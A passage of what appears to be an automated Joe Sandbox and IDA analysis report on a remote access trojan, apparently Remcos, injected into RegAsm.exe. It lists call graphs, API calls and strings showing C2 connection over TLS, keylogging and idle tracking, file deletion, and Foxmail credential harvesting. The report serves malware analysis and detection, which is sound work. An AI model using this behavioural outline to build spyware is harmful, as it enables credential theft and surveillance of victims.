                                                                • API ID: Sleep$ErrorLastLocalTime
                                                                • String ID: | $%I64u$5.1.1 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$PSG$Rmc-O0U3JA$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                                                                • API String ID: 524882891-2761049464
                                                                • Opcode ID: 800dcea17641d76944dc9b3c4e4e009f303a5d6159b7ffaa3b994c27c9eef6f6
                                                                • Instruction ID: 9dea7478a43989413a8a7de35667e348ffff56bc780dedce428272fd6db975fd
                                                                • Opcode Fuzzy Hash: 800dcea17641d76944dc9b3c4e4e009f303a5d6159b7ffaa3b994c27c9eef6f6
                                                                • Instruction Fuzzy Hash: B8526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 971 412aef-412b38 GetModuleFileNameW call 4020df * 3 978 412b3a-412bc4 call 41ba09 call 401fab call 40da23 call 401fd8 call 41ba09 call 401fab call 40da23 call 401fd8 call 41ba09 call 401fab call 40da23 call 401fd8 971->978 1003 412bc6-412c56 call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 978->1003 1026 412c66 1003->1026 1027 412c58-412c60 Sleep 1003->1027 1028 412c68-412cf8 call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1026->1028 1027->1003 1027->1026 1051 412d08 1028->1051 1052 412cfa-412d02 Sleep 1028->1052 1053 412d0a-412d9a call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1051->1053 1052->1028 1052->1051 1076 412daa-412dcf 1053->1076 1077 412d9c-412da4 Sleep 1053->1077 1078 412dd3-412def call 401f04 call 41c516 1076->1078 1077->1053 1077->1076 1083 412df1-412e00 call 401f04 DeleteFileW 1078->1083 1084 412e06-412e22 call 401f04 call 41c516 1078->1084 1083->1084 1091 412e24-412e3d call 401f04 DeleteFileW 1084->1091 1092 412e3f 1084->1092 1094 412e43-412e5f call 401f04 call 41c516 1091->1094 1092->1094 1100 412e61-412e73 call 401f04 DeleteFileW 1094->1100 1101 412e79-412e7b 1094->1101 1100->1101 1103 412e88-412e93 Sleep 1101->1103 1104 412e7d-412e7f 1101->1104 1103->1078 1105 412e99-412eab call 406b63 1103->1105 1104->1103 1107 412e81-412e86 1104->1107 1110 412f01-412f20 call 401f09 * 3 1105->1110 1111 412ead-412ebb call 406b63 1105->1111 1107->1103 1107->1105 1122 412f25-412f5e call 40b93f call 401f04 call 4020f6 call 413268 1110->1122 1111->1110 1117 412ebd-412ecb call 406b63 1111->1117 1117->1110 1123 412ecd-412ef9 Sleep call 401f09 * 3 1117->1123 1138 412f63-412f89 call 401f09 call 405b05 1122->1138 1123->978 1136 412eff 1123->1136 1136->1122 1143 4130e3-4131dc call 41bdaf call 402f31 call 402f10 * 6 call 402ea1 call 404aa1 call 401fd8 * 7 1138->1143 1144 412f8f-4130de call 41bdaf call 41bc1f call 402f31 call 402f10 * 6 call 402ea1 call 402f10 call 402ea1 call 404aa1 call 401fd8 * 10 1138->1144 1213 4131e0-413267 call 401fd8 call 401f09 call 401fd8 * 9 1143->1213 1144->1213
                                                                APIs
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                                  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,63A11986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                                • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                                • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                                • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                                • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                                • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                                • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                                • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                                • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                • String ID: /stext "$0TG$0TG$NG$NG
                                                                • API String ID: 1223786279-2576077980
                                                                • Opcode ID: 35879fcdd85bb84f47e01bfffedbda663f4e26d0481bea0dd64a75ca793394ca
                                                                • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                                                                • Opcode Fuzzy Hash: 35879fcdd85bb84f47e01bfffedbda663f4e26d0481bea0dd64a75ca793394ca
                                                                • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A

                                                                Control-flow Graph

                                                                APIs
                                                                • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                  • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                  • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                  • Part of subcall function 100010F1: FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                                  • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                • String ID: )$Foxmail$ProgramFiles
                                                                • API String ID: 672098462-2938083778
                                                                • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1286 414dc1-414dfd 1287 414e03-414e18 GetSystemDirectoryA 1286->1287 1288 414f18-414f23 1286->1288 1289 414f0e 1287->1289 1290 414e1e-414e6a call 441a8e call 441ae8 LoadLibraryA 1287->1290 1289->1288 1295 414e81-414ebb call 441a8e call 441ae8 LoadLibraryA 1290->1295 1296 414e6c-414e76 GetProcAddress 1290->1296 1309 414f0a-414f0d 1295->1309 1310 414ebd-414ec7 GetProcAddress 1295->1310 1297 414e78-414e7b FreeLibrary 1296->1297 1298 414e7d-414e7f 1296->1298 1297->1298 1298->1295 1300 414ed2 1298->1300 1302 414ed4-414ee5 GetProcAddress 1300->1302 1304 414ee7-414eeb 1302->1304 1305 414eef-414ef2 FreeLibrary 1302->1305 1304->1302 1307 414eed 1304->1307 1308 414ef4-414ef6 1305->1308 1307->1308 1308->1309 1311 414ef8-414f08 1308->1311 1309->1289 1312 414ec9-414ecc FreeLibrary 1310->1312 1313 414ece-414ed0 1310->1313 1311->1309 1311->1311 1312->1313 1313->1300 1313->1309
                                                                APIs
                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                                • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                                • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                                • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                                • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                                • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                • API String ID: 2490988753-744132762
                                                                • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                                • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                                                • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                                • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE

                                                                Control-flow Graph

                                                                APIs
                                                                • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                                  • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                                  • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                  • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                  • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040A859
                                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                                                • API String ID: 3795512280-1152054767
                                                                • Opcode ID: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                                                                • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                                                • Opcode Fuzzy Hash: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                                                                • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1412 4048c8-4048e8 connect 1413 404a1b-404a1f 1412->1413 1414 4048ee-4048f1 1412->1414 1417 404a21-404a2f WSAGetLastError 1413->1417 1418 404a97 1413->1418 1415 404a17-404a19 1414->1415 1416 4048f7-4048fa 1414->1416 1419 404a99-404a9e 1415->1419 1420 404926-404930 call 420cf1 1416->1420 1421 4048fc-404923 call 40531e call 402093 call 41b580 1416->1421 1417->1418 1422 404a31-404a34 1417->1422 1418->1419 1434 404941-40494e call 420f20 1420->1434 1435 404932-40493c 1420->1435 1421->1420 1424 404a71-404a76 1422->1424 1425 404a36-404a6f call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 1422->1425 1427 404a7b-404a94 call 402093 * 2 call 41b580 1424->1427 1425->1418 1427->1418 1444 404950-404973 call 402093 * 2 call 41b580 1434->1444 1445 404987-404992 call 421ad1 1434->1445 1435->1427 1474 404976-404982 call 420d31 1444->1474 1458 4049c4-4049d1 call 420e97 1445->1458 1459 404994-4049c2 call 402093 * 2 call 41b580 call 421143 1445->1459 1471 4049d3-4049f6 call 402093 * 2 call 41b580 1458->1471 1472 4049f9-404a14 CreateEventW * 2 1458->1472 1459->1474 1471->1472 1472->1415 1474->1418
                                                                APIs
                                                                • connect.WS2_32(FFFFFFFF,00AC4830,00000010), ref: 004048E0
                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                • WSAGetLastError.WS2_32 ref: 00404A21
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                • API String ID: 994465650-2151626615
                                                                • Opcode ID: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                                                                • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                                                • Opcode Fuzzy Hash: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                                                                • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF

                                                                Control-flow Graph

                                                                APIs
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                • CloseHandle.KERNEL32(?), ref: 00404E4C
                                                                • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                                • CloseHandle.KERNEL32(?), ref: 00404EBF
                                                                • CloseHandle.KERNEL32(?), ref: 00404EC4
                                                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                                • CloseHandle.KERNEL32(?), ref: 00404ED6
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                • String ID:
                                                                • API String ID: 3658366068-0
                                                                • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                                • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58

                                                                Control-flow Graph

                                                                APIs
                                                                • __Init_thread_footer.LIBCMT ref: 0040AD73
                                                                • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                                                • GetForegroundWindow.USER32 ref: 0040AD84
                                                                • GetWindowTextLengthW.USER32 ref: 0040AD8D
                                                                • GetWindowTextW.USER32 ref: 0040ADC1
                                                                • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                                  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                • String ID: [${ User has been idle for $ minutes }$]
                                                                • API String ID: 911427763-3954389425
                                                                • Opcode ID: 67b6da18cae3e8576f7385e0c2c8ebcc1754692b360f15e2fa026ce444ac7b22
                                                                • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                                                                • Opcode Fuzzy Hash: 67b6da18cae3e8576f7385e0c2c8ebcc1754692b360f15e2fa026ce444ac7b22
                                                                • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1584 40da6f-40da94 call 401f86 1587 40da9a 1584->1587 1588 40dbbe-40dc56 call 401f04 GetLongPathNameW call 40417e * 2 call 40de0c call 402fa5 * 2 call 401f09 * 5 1584->1588 1590 40dae0-40dae7 call 41c048 1587->1590 1591 40daa1-40daa6 1587->1591 1592 40db93-40db98 1587->1592 1593 40dad6-40dadb 1587->1593 1594 40dba9 1587->1594 1595 40db9a-40dba7 call 43c11f 1587->1595 1596 40daab-40dab9 call 41b645 call 401f13 1587->1596 1597 40dacc-40dad1 1587->1597 1598 40db8c-40db91 1587->1598 1610 40dae9-40db39 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1590->1610 1611 40db3b-40db87 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1590->1611 1600 40dbae call 43c11f 1591->1600 1592->1600 1593->1600 1594->1600 1595->1594 1612 40dbb4-40dbb9 call 409092 1595->1612 1618 40dabe 1596->1618 1597->1600 1598->1600 1613 40dbb3 1600->1613 1623 40dac2-40dac7 call 401f09 1610->1623 1611->1618 1612->1588 1613->1612 1618->1623 1623->1588
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LongNamePath
                                                                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                • API String ID: 82841172-425784914
                                                                • Opcode ID: b8d894b691b3e00382c27ba12a86ce93fa8d51d86cdbf8ec607a257f19f9a43d
                                                                • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                                • Opcode Fuzzy Hash: b8d894b691b3e00382c27ba12a86ce93fa8d51d86cdbf8ec607a257f19f9a43d
                                                                • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1683 44acc9-44ace2 1684 44ace4-44acf4 call 4467e6 1683->1684 1685 44acf8-44acfd 1683->1685 1684->1685 1692 44acf6 1684->1692 1687 44acff-44ad07 1685->1687 1688 44ad0a-44ad2e MultiByteToWideChar 1685->1688 1687->1688 1690 44ad34-44ad40 1688->1690 1691 44aec1-44aed4 call 43502b 1688->1691 1693 44ad94 1690->1693 1694 44ad42-44ad53 1690->1694 1692->1685 1696 44ad96-44ad98 1693->1696 1697 44ad55-44ad64 call 457210 1694->1697 1698 44ad72-44ad83 call 4461b8 1694->1698 1700 44aeb6 1696->1700 1701 44ad9e-44adb1 MultiByteToWideChar 1696->1701 1697->1700 1711 44ad6a-44ad70 1697->1711 1698->1700 1708 44ad89 1698->1708 1706 44aeb8-44aebf call 435ecd 1700->1706 1701->1700 1705 44adb7-44adc9 call 448c33 1701->1705 1713 44adce-44add2 1705->1713 1706->1691 1712 44ad8f-44ad92 1708->1712 1711->1712 1712->1696 1713->1700 1715 44add8-44addf 1713->1715 1716 44ade1-44ade6 1715->1716 1717 44ae19-44ae25 1715->1717 1716->1706 1720 44adec-44adee 1716->1720 1718 44ae27-44ae38 1717->1718 1719 44ae71 1717->1719 1721 44ae53-44ae64 call 4461b8 1718->1721 1722 44ae3a-44ae49 call 457210 1718->1722 1723 44ae73-44ae75 1719->1723 1720->1700 1724 44adf4-44ae0e call 448c33 1720->1724 1728 44aeaf-44aeb5 call 435ecd 1721->1728 1737 44ae66 1721->1737 1722->1728 1735 44ae4b-44ae51 1722->1735 1727 44ae77-44ae90 call 448c33 1723->1727 1723->1728 1724->1706 1739 44ae14 1724->1739 1727->1728 1740 44ae92-44ae99 1727->1740 1728->1700 1741 44ae6c-44ae6f 1735->1741 1737->1741 1739->1700 1742 44aed5-44aedb 1740->1742 1743 44ae9b-44ae9c 1740->1743 1741->1723 1744 44ae9d-44aead WideCharToMultiByte 1742->1744 1743->1744 1744->1728 1745 44aedd-44aee4 call 435ecd 1744->1745 1745->1706
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                                                                • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                                                                • __alloca_probe_16.LIBCMT ref: 0044AE40
                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                                • __freea.LIBCMT ref: 0044AEB0
                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                • __freea.LIBCMT ref: 0044AEB9
                                                                • __freea.LIBCMT ref: 0044AEDE
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                • String ID:
                                                                • API String ID: 3864826663-0
                                                                • Opcode ID: 276b4224ba7534166915209a775ab474993eb6b0505c2e4c67818911aa509b1e
                                                                • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                                                • Opcode Fuzzy Hash: 276b4224ba7534166915209a775ab474993eb6b0505c2e4c67818911aa509b1e
                                                                • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C508
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$CloseHandle$CreatePointerWrite
                                                                • String ID: xpF
                                                                • API String ID: 1852769593-354647465
                                                                • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                                • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                                                APIs
                                                                  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                  • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
